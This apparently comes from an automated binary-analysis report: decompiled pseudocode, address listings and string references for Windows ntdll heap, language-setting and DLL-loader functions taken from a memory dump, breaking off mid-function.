                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                              • API String ID: 0-2897834094
                                              • Opcode ID: 00a20a369aae42358fcf696f59d4827e61750c13a64cd0e9475ad1ec85b8033e
                                              • Instruction ID: 544a948ebb63d8e139dfe31963356b59c7459711c1a87240bd9768d353fbec88
                                              • Opcode Fuzzy Hash: 00a20a369aae42358fcf696f59d4827e61750c13a64cd0e9475ad1ec85b8033e
                                              • Instruction Fuzzy Hash: 9F61C536925144DFE711EB49ECA5D2973ECEB44B30B09807AF549AF353C639D840EB1A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E00FB3D34(signed int* __ecx) {
                                              				signed int* _v8;
                                              				char _v12;
                                              				signed int* _v16;
                                              				signed int* _v20;
                                              				char _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				char _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int* _v48;
                                              				signed int* _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				char _v68;
                                              				signed int _t140;
                                              				signed int _t161;
                                              				signed int* _t236;
                                              				signed int* _t242;
                                              				signed int* _t243;
                                              				signed int* _t244;
                                              				signed int* _t245;
                                              				signed int _t255;
                                              				void* _t257;
                                              				signed int _t260;
                                              				void* _t262;
                                              				signed int _t264;
                                              				void* _t267;
                                              				signed int _t275;
                                              				signed int* _t276;
                                              				short* _t277;
                                              				signed int* _t278;
                                              				signed int* _t279;
                                              				signed int* _t280;
                                              				short* _t281;
                                              				signed int* _t282;
                                              				short* _t283;
                                              				signed int* _t284;
                                              				void* _t285;
                                              
                                              				_v60 = _v60 | 0xffffffff;
                                              				_t280 = 0;
                                              				_t242 = __ecx;
                                              				_v52 = __ecx;
                                              				_v8 = 0;
                                              				_v20 = 0;
                                              				_v40 = 0;
                                              				_v28 = 0;
                                              				_v32 = 0;
                                              				_v44 = 0;
                                              				_v56 = 0;
                                              				_t275 = 0;
                                              				_v16 = 0;
                                              				if(__ecx == 0) {
                                              					_t280 = 0xc000000d;
                                              					_t140 = 0;
                                              					L50:
                                              					 *_t242 =  *_t242 | 0x00000800;
                                              					_t242[0x13] = _t140;
                                              					_t242[0x16] = _v40;
                                              					_t242[0x18] = _v28;
                                              					_t242[0x14] = _v32;
                                              					_t242[0x17] = _t275;
                                              					_t242[0x15] = _v44;
                                              					_t242[0x11] = _v56;
                                              					_t242[0x12] = _v60;
                                              					return _t280;
                                              				}
                                              				if(E00FB1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                              					_v56 = 1;
                                              					if(_v8 != 0) {
                                              						L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                              					}
                                              					_v8 = _t280;
                                              				}
                                              				if(E00FB1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                              					_v60 =  *_v8;
                                              					L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                              					_v8 = _t280;
                                              				}
                                              				if(E00FB1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                              					L16:
                                              					if(E00FB1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                              						L28:
                                              						if(E00FB1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                              							L46:
                                              							_t275 = _v16;
                                              							L47:
                                              							_t161 = 0;
                                              							L48:
                                              							if(_v8 != 0) {
                                              								L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                              							}
                                              							_t140 = _v20;
                                              							if(_t140 != 0) {
                                              								if(_t275 != 0) {
                                              									L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                              									_t275 = 0;
                                              									_v28 = 0;
                                              									_t140 = _v20;
                                              								}
                                              							}
                                              							goto L50;
                                              						}
                                              						_t167 = _v12;
                                              						_t255 = _v12 + 4;
                                              						_v44 = _t255;
                                              						if(_t255 == 0) {
                                              							_t276 = _t280;
                                              							_v32 = _t280;
                                              						} else {
                                              							_t276 = L00FC4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                              							_t167 = _v12;
                                              							_v32 = _t276;
                                              						}
                                              						if(_t276 == 0) {
                                              							_v44 = _t280;
                                              							_t280 = 0xc0000017;
                                              							goto L46;
                                              						} else {
                                              							E00FEF3E0(_t276, _v8, _t167);
                                              							_v48 = _t276;
                                              							_t277 = E00FF1370(_t276, 0xf84e90);
                                              							_pop(_t257);
                                              							if(_t277 == 0) {
                                              								L38:
                                              								_t170 = _v48;
                                              								if( *_v48 != 0) {
                                              									E00FEBB40(0,  &_v68, _t170);
                                              									if(L00FB43C0( &_v68,  &_v24) != 0) {
                                              										_t280 =  &(_t280[0]);
                                              									}
                                              								}
                                              								if(_t280 == 0) {
                                              									_t280 = 0;
                                              									L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                              									_v44 = 0;
                                              									_v32 = 0;
                                              								} else {
                                              									_t280 = 0;
                                              								}
                                              								_t174 = _v8;
                                              								if(_v8 != 0) {
                                              									L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                              								}
                                              								_v8 = _t280;
                                              								goto L46;
                                              							}
                                              							_t243 = _v48;
                                              							do {
                                              								 *_t277 = 0;
                                              								_t278 = _t277 + 2;
                                              								E00FEBB40(_t257,  &_v68, _t243);
                                              								if(L00FB43C0( &_v68,  &_v24) != 0) {
                                              									_t280 =  &(_t280[0]);
                                              								}
                                              								_t243 = _t278;
                                              								_t277 = E00FF1370(_t278, 0xf84e90);
                                              								_pop(_t257);
                                              							} while (_t277 != 0);
                                              							_v48 = _t243;
                                              							_t242 = _v52;
                                              							goto L38;
                                              						}
                                              					}
                                              					_t191 = _v12;
                                              					_t260 = _v12 + 4;
                                              					_v28 = _t260;
                                              					if(_t260 == 0) {
                                              						_t275 = _t280;
                                              						_v16 = _t280;
                                              					} else {
                                              						_t275 = L00FC4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                              						_t191 = _v12;
                                              						_v16 = _t275;
                                              					}
                                              					if(_t275 == 0) {
                                              						_v28 = _t280;
                                              						_t280 = 0xc0000017;
                                              						goto L47;
                                              					} else {
                                              						E00FEF3E0(_t275, _v8, _t191);
                                              						_t285 = _t285 + 0xc;
                                              						_v48 = _t275;
                                              						_t279 = _t280;
                                              						_t281 = E00FF1370(_v16, 0xf84e90);
                                              						_pop(_t262);
                                              						if(_t281 != 0) {
                                              							_t244 = _v48;
                                              							do {
                                              								 *_t281 = 0;
                                              								_t282 = _t281 + 2;
                                              								E00FEBB40(_t262,  &_v68, _t244);
                                              								if(L00FB43C0( &_v68,  &_v24) != 0) {
                                              									_t279 =  &(_t279[0]);
                                              								}
                                              								_t244 = _t282;
                                              								_t281 = E00FF1370(_t282, 0xf84e90);
                                              								_pop(_t262);
                                              							} while (_t281 != 0);
                                              							_v48 = _t244;
                                              							_t242 = _v52;
                                              						}
                                              						_t201 = _v48;
                                              						_t280 = 0;
                                              						if( *_v48 != 0) {
                                              							E00FEBB40(_t262,  &_v68, _t201);
                                              							if(L00FB43C0( &_v68,  &_v24) != 0) {
                                              								_t279 =  &(_t279[0]);
                                              							}
                                              						}
                                              						if(_t279 == 0) {
                                              							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                              							_v28 = _t280;
                                              							_v16 = _t280;
                                              						}
                                              						_t202 = _v8;
                                              						if(_v8 != 0) {
                                              							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                              						}
                                              						_v8 = _t280;
                                              						goto L28;
                                              					}
                                              				}
                                              				_t214 = _v12;
                                              				_t264 = _v12 + 4;
                                              				_v40 = _t264;
                                              				if(_t264 == 0) {
                                              					_v20 = _t280;
                                              				} else {
                                              					_t236 = L00FC4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                              					_t280 = _t236;
                                              					_v20 = _t236;
                                              					_t214 = _v12;
                                              				}
                                              				if(_t280 == 0) {
                                              					_t161 = 0;
                                              					_t280 = 0xc0000017;
                                              					_v40 = 0;
                                              					goto L48;
                                              				} else {
                                              					E00FEF3E0(_t280, _v8, _t214);
                                              					_t285 = _t285 + 0xc;
                                              					_v48 = _t280;
                                              					_t283 = E00FF1370(_t280, 0xf84e90);
                                              					_pop(_t267);
                                              					if(_t283 != 0) {
                                              						_t245 = _v48;
                                              						do {
                                              							 *_t283 = 0;
                                              							_t284 = _t283 + 2;
                                              							E00FEBB40(_t267,  &_v68, _t245);
                                              							if(L00FB43C0( &_v68,  &_v24) != 0) {
                                              								_t275 = _t275 + 1;
                                              							}
                                              							_t245 = _t284;
                                              							_t283 = E00FF1370(_t284, 0xf84e90);
                                              							_pop(_t267);
                                              						} while (_t283 != 0);
                                              						_v48 = _t245;
                                              						_t242 = _v52;
                                              					}
                                              					_t224 = _v48;
                                              					_t280 = 0;
                                              					if( *_v48 != 0) {
                                              						E00FEBB40(_t267,  &_v68, _t224);
                                              						if(L00FB43C0( &_v68,  &_v24) != 0) {
                                              							_t275 = _t275 + 1;
                                              						}
                                              					}
                                              					if(_t275 == 0) {
                                              						L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                              						_v40 = _t280;
                                              						_v20 = _t280;
                                              					}
                                              					_t225 = _v8;
                                              					if(_v8 != 0) {
                                              						L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                              					}
                                              					_v8 = _t280;
                                              					goto L16;
                                              				}
                                              			}

                                              0x00fb3d3c
                                              0x00fb3d42
                                              0x00fb3d44
                                              0x00fb3d46
                                              0x00fb3d49
                                              0x00fb3d4c
                                              0x00fb3d4f
                                              0x00fb3d52
                                              0x00fb3d55
                                              0x00fb3d58
                                              0x00fb3d5b
                                              0x00fb3d5f
                                              0x00fb3d61
                                              0x00fb3d66
                                              0x01008213
                                              0x01008218
                                              0x00fb4085
                                              0x00fb4088
                                              0x00fb408e
                                              0x00fb4094
                                              0x00fb409a
                                              0x00fb40a0
                                              0x00fb40a6
                                              0x00fb40a9
                                              0x00fb40af
                                              0x00fb40b6
                                              0x00fb40bd
                                              0x00fb40bd
                                              0x00fb3d83
                                              0x0100821f
                                              0x01008229
                                              0x01008238
                                              0x01008238
                                              0x0100823d
                                              0x0100823d
                                              0x00fb3da0
                                              0x00fb3daf
                                              0x00fb3db5
                                              0x00fb3dba
                                              0x00fb3dba
                                              0x00fb3dd4
                                              0x00fb3e94
                                              0x00fb3eab
                                              0x00fb3f6d
                                              0x00fb3f84
                                              0x00fb406b
                                              0x00fb406b
                                              0x00fb406e
                                              0x00fb406e
                                              0x00fb4070
                                              0x00fb4074
                                              0x01008351
                                              0x01008351
                                              0x00fb407a
                                              0x00fb407f
                                              0x0100835d
                                              0x01008370
                                              0x01008377
                                              0x01008379
                                              0x0100837c
                                              0x0100837c
                                              0x0100835d
                                              0x00000000
                                              0x00fb407f
                                              0x00fb3f8a
                                              0x00fb3f8d
                                              0x00fb3f90
                                              0x00fb3f95
                                              0x0100830d
                                              0x0100830f
                                              0x00fb3f9b
                                              0x00fb3fac
                                              0x00fb3fae
                                              0x00fb3fb1
                                              0x00fb3fb1
                                              0x00fb3fb6
                                              0x01008317
                                              0x0100831a
                                              0x00000000
                                              0x00fb3fbc
                                              0x00fb3fc1
                                              0x00fb3fc9
                                              0x00fb3fd7
                                              0x00fb3fda
                                              0x00fb3fdd
                                              0x00fb4021
                                              0x00fb4021
                                              0x00fb4029
                                              0x00fb4030
                                              0x00fb4044
                                              0x00fb4046
                                              0x00fb4046
                                              0x00fb4044
                                              0x00fb4049
                                              0x01008327
                                              0x01008334
                                              0x01008339
                                              0x0100833c
                                              0x00fb404f
                                              0x00fb404f
                                              0x00fb404f
                                              0x00fb4051
                                              0x00fb4056
                                              0x00fb4063
                                              0x00fb4063
                                              0x00fb4068
                                              0x00000000
                                              0x00fb4068
                                              0x00fb3fdf
                                              0x00fb3fe2
                                              0x00fb3fe4
                                              0x00fb3fe7
                                              0x00fb3fef
                                              0x00fb4003
                                              0x00fb4005
                                              0x00fb4005
                                              0x00fb400c
                                              0x00fb4013
                                              0x00fb4016
                                              0x00fb4017
                                              0x00fb401b
                                              0x00fb401e
                                              0x00000000
                                              0x00fb401e
                                              0x00fb3fb6
                                              0x00fb3eb1
                                              0x00fb3eb4
                                              0x00fb3eb7
                                              0x00fb3ebc
                                              0x010082a9
                                              0x010082ab
                                              0x00fb3ec2
                                              0x00fb3ed3
                                              0x00fb3ed5
                                              0x00fb3ed8
                                              0x00fb3ed8
                                              0x00fb3edd
                                              0x010082b3
                                              0x010082b6
                                              0x00000000
                                              0x00fb3ee3
                                              0x00fb3ee8
                                              0x00fb3eed
                                              0x00fb3ef0
                                              0x00fb3ef3
                                              0x00fb3f02
                                              0x00fb3f05
                                              0x00fb3f08
                                              0x010082c0
                                              0x010082c3
                                              0x010082c5
                                              0x010082c8
                                              0x010082d0
                                              0x010082e4
                                              0x010082e6
                                              0x010082e6
                                              0x010082ed
                                              0x010082f4
                                              0x010082f7
                                              0x010082f8
                                              0x010082fc
                                              0x010082ff
                                              0x010082ff
                                              0x00fb3f0e
                                              0x00fb3f11
                                              0x00fb3f16
                                              0x00fb3f1d
                                              0x00fb3f31
                                              0x01008307
                                              0x01008307
                                              0x00fb3f31
                                              0x00fb3f39
                                              0x00fb3f48
                                              0x00fb3f4d
                                              0x00fb3f50
                                              0x00fb3f50
                                              0x00fb3f53
                                              0x00fb3f58
                                              0x00fb3f65
                                              0x00fb3f65
                                              0x00fb3f6a
                                              0x00000000
                                              0x00fb3f6a
                                              0x00fb3edd
                                              0x00fb3dda
                                              0x00fb3ddd
                                              0x00fb3de0
                                              0x00fb3de5
                                              0x01008245
                                              0x00fb3deb
                                              0x00fb3df7
                                              0x00fb3dfc
                                              0x00fb3dfe
                                              0x00fb3e01
                                              0x00fb3e01
                                              0x00fb3e06
                                              0x0100824d
                                              0x0100824f
                                              0x01008254
                                              0x00000000
                                              0x00fb3e0c
                                              0x00fb3e11
                                              0x00fb3e16
                                              0x00fb3e19
                                              0x00fb3e29
                                              0x00fb3e2c
                                              0x00fb3e2f
                                              0x0100825c
                                              0x0100825f
                                              0x01008261
                                              0x01008264
                                              0x0100826c
                                              0x01008280
                                              0x01008282
                                              0x01008282
                                              0x01008289
                                              0x01008290
                                              0x01008293
                                              0x01008294
                                              0x01008298
                                              0x0100829b
                                              0x0100829b
                                              0x00fb3e35
                                              0x00fb3e38
                                              0x00fb3e3d
                                              0x00fb3e44
                                              0x00fb3e58
                                              0x010082a3
                                              0x010082a3
                                              0x00fb3e58
                                              0x00fb3e60
                                              0x00fb3e6f
                                              0x00fb3e74
                                              0x00fb3e77
                                              0x00fb3e77
                                              0x00fb3e7a
                                              0x00fb3e7f
                                              0x00fb3e8c
                                              0x00fb3e8c
                                              0x00fb3e91
                                              0x00000000
                                              0x00fb3e91

                                              Strings
                                              • Kernel-MUI-Language-SKU, xrefs: 00FB3F70
                                              • WindowsExcludedProcs, xrefs: 00FB3D6F
                                              • Kernel-MUI-Number-Allowed, xrefs: 00FB3D8C
                                              • Kernel-MUI-Language-Disallowed, xrefs: 00FB3E97
                                              • Kernel-MUI-Language-Allowed, xrefs: 00FB3DC0
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-258546922
                                              • Opcode ID: 0baf877336970f783f5f0084c83853e0e9bc371858b7976a6a6a96cf327b7c75
                                              • Instruction ID: b1bcd092ca4e9cdb20b586833fd2774826d7119a80d1b59648492cdd7ebb2e39
                                              • Opcode Fuzzy Hash: 0baf877336970f783f5f0084c83853e0e9bc371858b7976a6a6a96cf327b7c75
                                              • Instruction Fuzzy Hash: 12F14C72D00659EBCB11DF99C981AEEBBB9FF48750F14406AE505A7251E734AE00EFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 44%
                                              			E00FD8E00(void* __ecx) {
                                              				signed int _v8;
                                              				char _v12;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr* _t32;
                                              				intOrPtr _t35;
                                              				intOrPtr _t43;
                                              				void* _t46;
                                              				intOrPtr _t47;
                                              				void* _t48;
                                              				signed int _t49;
                                              				void* _t50;
                                              				intOrPtr* _t51;
                                              				signed int _t52;
                                              				void* _t53;
                                              				intOrPtr _t55;
                                              
                                              				_v8 =  *0x109d360 ^ _t52;
                                              				_t49 = 0;
                                              				_t48 = __ecx;
                                              				_t55 =  *0x1098464; // 0x74e10110
                                              				if(_t55 == 0) {
                                              					L9:
                                              					if( !_t49 >= 0) {
                                              						if(( *0x1095780 & 0x00000003) != 0) {
                                              							E01025510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                              						}
                                              						if(( *0x1095780 & 0x00000010) != 0) {
                                              							asm("int3");
                                              						}
                                              					}
                                              					return E00FEB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                              				}
                                              				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                              				_t43 =  *0x1097984; // 0xb42af8
                                              				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                              					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                              					if(_t48 == _t43) {
                                              						_t50 = 0x5c;
                                              						if( *_t32 == _t50) {
                                              							_t46 = 0x3f;
                                              							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                              								_t32 = _t32 + 8;
                                              							}
                                              						}
                                              					}
                                              					_t51 =  *0x1098464; // 0x74e10110
                                              					 *0x109b1e0(_t47, _t32,  &_v12);
                                              					_t49 =  *_t51();
                                              					if(_t49 >= 0) {
                                              						L8:
                                              						_t35 = _v12;
                                              						if(_t35 != 0) {
                                              							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                              								E00FD9B10( *((intOrPtr*)(_t48 + 0x48)));
                                              								_t35 = _v12;
                                              							}
                                              							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                              						}
                                              						goto L9;
                                              					}
                                              					if(_t49 != 0xc000008a) {
                                              						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                              							if(_t49 != 0xc00000bb) {
                                              								goto L8;
                                              							}
                                              						}
                                              					}
                                              					if(( *0x1095780 & 0x00000005) != 0) {
                                              						_push(_t49);
                                              						E01025510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                              						_t53 = _t53 + 0x1c;
                                              					}
                                              					_t49 = 0;
                                              					goto L8;
                                              				} else {
                                              					goto L9;
                                              				}
                                              			}

                                              0x00fd8e0f
                                              0x00fd8e16
                                              0x00fd8e19
                                              0x00fd8e1b
                                              0x00fd8e21
                                              0x00fd8e7f
                                              0x00fd8e85
                                              0x01019354
                                              0x0101936c
                                              0x01019371
                                              0x0101937b
                                              0x01019381
                                              0x01019381
                                              0x0101937b
                                              0x00fd8e9d
                                              0x00fd8e9d
                                              0x00fd8e29
                                              0x00fd8e2c
                                              0x00fd8e38
                                              0x00fd8e3e
                                              0x00fd8e43
                                              0x00fd8eb5
                                              0x00fd8eb9
                                              0x010192aa
                                              0x010192af
                                              0x010192e8
                                              0x010192e8
                                              0x010192af
                                              0x00fd8eb9
                                              0x00fd8e45
                                              0x00fd8e53
                                              0x00fd8e5b
                                              0x00fd8e5f
                                              0x00fd8e78
                                              0x00fd8e78
                                              0x00fd8e7d
                                              0x00fd8ec3
                                              0x00fd8ecd
                                              0x00fd8ed2
                                              0x00fd8ed2
                                              0x00fd8ec5
                                              0x00fd8ec5
                                              0x00000000
                                              0x00fd8e7d
                                              0x00fd8e67
                                              0x00fd8ea4
                                              0x0101931a
                                              0x00000000
                                              0x00000000
                                              0x01019320
                                              0x00fd8ea4
                                              0x00fd8e70
                                              0x01019325
                                              0x01019340
                                              0x01019345
                                              0x01019345
                                              0x00fd8e76
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Strings
                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0101932A
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 0101933B, 01019367
                                              • LdrpFindDllActivationContext, xrefs: 01019331, 0101935D
                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 01019357
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 0-3779518884
                                              • Opcode ID: 6b8a09ebc1545ded3625b9bd43ca90b469d7d2b3f4b6f30f8ee04ade257b3210
                                              • Instruction ID: 99dde20f045b4827b66ad037982da1c6eed9af279952caa784e184b07f281229
                                              • Opcode Fuzzy Hash: 6b8a09ebc1545ded3625b9bd43ca90b469d7d2b3f4b6f30f8ee04ade257b3210
                                              • Instruction Fuzzy Hash: B9413C32E003159EDB316B88CC59B79B3B2BB013A4F0D856BD44457391EF749D81ABC1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 83%
                                              			E00FB8794(void* __ecx) {
                                              				signed int _v0;
                                              				char _v8;
                                              				signed int _v12;
                                              				void* _v16;
                                              				signed int _v20;
                                              				intOrPtr _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v40;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				intOrPtr* _t77;
                                              				signed int _t80;
                                              				signed char _t81;
                                              				signed int _t87;
                                              				signed int _t91;
                                              				void* _t92;
                                              				void* _t94;
                                              				signed int _t95;
                                              				signed int _t103;
                                              				signed int _t105;
                                              				signed int _t110;
                                              				signed int _t118;
                                              				intOrPtr* _t121;
                                              				intOrPtr _t122;
                                              				signed int _t125;
                                              				signed int _t129;
                                              				signed int _t131;
                                              				signed int _t134;
                                              				signed int _t136;
                                              				signed int _t143;
                                              				signed int* _t147;
                                              				signed int _t151;
                                              				void* _t153;
                                              				signed int* _t157;
                                              				signed int _t159;
                                              				signed int _t161;
                                              				signed int _t166;
                                              				signed int _t168;
                                              
                                              				_push(__ecx);
                                              				_t153 = __ecx;
                                              				_t159 = 0;
                                              				_t121 = __ecx + 0x3c;
                                              				if( *_t121 == 0) {
                                              					L2:
                                              					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                              					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                              						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                              						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                              						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                              							L6:
                                              							if(E00FB934A() != 0) {
                                              								_t159 = E0102A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                              								__eflags = _t159;
                                              								if(_t159 < 0) {
                                              									_t81 =  *0x1095780; // 0x0
                                              									__eflags = _t81 & 0x00000003;
                                              									if((_t81 & 0x00000003) != 0) {
                                              										_push(_t159);
                                              										E01025510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                              										_t81 =  *0x1095780; // 0x0
                                              									}
                                              									__eflags = _t81 & 0x00000010;
                                              									if((_t81 & 0x00000010) != 0) {
                                              										asm("int3");
                                              									}
                                              								}
                                              							}
                                              						} else {
                                              							_t159 = E00FB849B(0, _t122, _t153, _t159, _t180);
                                              							if(_t159 >= 0) {
                                              								goto L6;
                                              							}
                                              						}
                                              						_t80 = _t159;
                                              						goto L8;
                                              					} else {
                                              						_t125 = 0x13;
                                              						asm("int 0x29");
                                              						_push(0);
                                              						_push(_t159);
                                              						_t161 = _t125;
                                              						_t87 =  *( *[fs:0x30] + 0x1e8);
                                              						_t143 = 0;
                                              						_v40 = _t161;
                                              						_t118 = 0;
                                              						_push(_t153);
                                              						__eflags = _t87;
                                              						if(_t87 != 0) {
                                              							_t118 = _t87 + 0x5d8;
                                              							__eflags = _t118;
                                              							if(_t118 == 0) {
                                              								L46:
                                              								_t118 = 0;
                                              							} else {
                                              								__eflags =  *(_t118 + 0x30);
                                              								if( *(_t118 + 0x30) == 0) {
                                              									goto L46;
                                              								}
                                              							}
                                              						}
                                              						_v32 = 0;
                                              						_v28 = 0;
                                              						_v16 = 0;
                                              						_v20 = 0;
                                              						_v12 = 0;
                                              						__eflags = _t118;
                                              						if(_t118 != 0) {
                                              							__eflags = _t161;
                                              							if(_t161 != 0) {
                                              								__eflags =  *(_t118 + 8);
                                              								if( *(_t118 + 8) == 0) {
                                              									L22:
                                              									_t143 = 1;
                                              									__eflags = 1;
                                              								} else {
                                              									_t19 = _t118 + 0x40; // 0x40
                                              									_t156 = _t19;
                                              									E00FB8999(_t19,  &_v16);
                                              									__eflags = _v0;
                                              									if(_v0 != 0) {
                                              										__eflags = _v0 - 1;
                                              										if(_v0 != 1) {
                                              											goto L22;
                                              										} else {
                                              											_t128 =  *(_t161 + 0x64);
                                              											__eflags =  *(_t161 + 0x64);
                                              											if( *(_t161 + 0x64) == 0) {
                                              												goto L22;
                                              											} else {
                                              												E00FB8999(_t128,  &_v12);
                                              												_t147 = _v12;
                                              												_t91 = 0;
                                              												__eflags = 0;
                                              												_t129 =  *_t147;
                                              												while(1) {
                                              													__eflags =  *((intOrPtr*)(0x1095c60 + _t91 * 8)) - _t129;
                                              													if( *((intOrPtr*)(0x1095c60 + _t91 * 8)) == _t129) {
                                              														break;
                                              													}
                                              													_t91 = _t91 + 1;
                                              													__eflags = _t91 - 5;
                                              													if(_t91 < 5) {
                                              														continue;
                                              													} else {
                                              														_t131 = 0;
                                              														__eflags = 0;
                                              													}
                                              													L37:
                                              													__eflags = _t131;
                                              													if(_t131 != 0) {
                                              														goto L22;
                                              													} else {
                                              														__eflags = _v16 - _t147;
                                              														if(_v16 != _t147) {
                                              															goto L22;
                                              														} else {
                                              															E00FC2280(_t92, 0x10986cc);
                                              															_t94 = E01079DFB( &_v20);
                                              															__eflags = _t94 - 1;
                                              															if(_t94 != 1) {
                                              															}
                                              															asm("movsd");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															 *_t118 =  *_t118 + 1;
                                              															asm("adc dword [ebx+0x4], 0x0");
                                              															_t95 = E00FD61A0( &_v32);
                                              															__eflags = _t95;
                                              															if(_t95 != 0) {
                                              																__eflags = _v32 | _v28;
                                              																if((_v32 | _v28) != 0) {
                                              																	_t71 = _t118 + 0x40; // 0x3f
                                              																	_t134 = _t71;
                                              																	goto L55;
                                              																}
                                              															}
                                              															goto L30;
                                              														}
                                              													}
                                              													goto L56;
                                              												}
                                              												_t92 = 0x1095c64 + _t91 * 8;
                                              												asm("lock xadd [eax], ecx");
                                              												_t131 = (_t129 | 0xffffffff) - 1;
                                              												goto L37;
                                              											}
                                              										}
                                              										goto L56;
                                              									} else {
                                              										_t143 = E00FB8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                              										__eflags = _t143;
                                              										if(_t143 != 0) {
                                              											_t157 = _v12;
                                              											_t103 = 0;
                                              											__eflags = 0;
                                              											_t136 =  &(_t157[1]);
                                              											 *(_t161 + 0x64) = _t136;
                                              											_t151 =  *_t157;
                                              											_v20 = _t136;
                                              											while(1) {
                                              												__eflags =  *((intOrPtr*)(0x1095c60 + _t103 * 8)) - _t151;
                                              												if( *((intOrPtr*)(0x1095c60 + _t103 * 8)) == _t151) {
                                              													break;
                                              												}
                                              												_t103 = _t103 + 1;
                                              												__eflags = _t103 - 5;
                                              												if(_t103 < 5) {
                                              													continue;
                                              												}
                                              												L21:
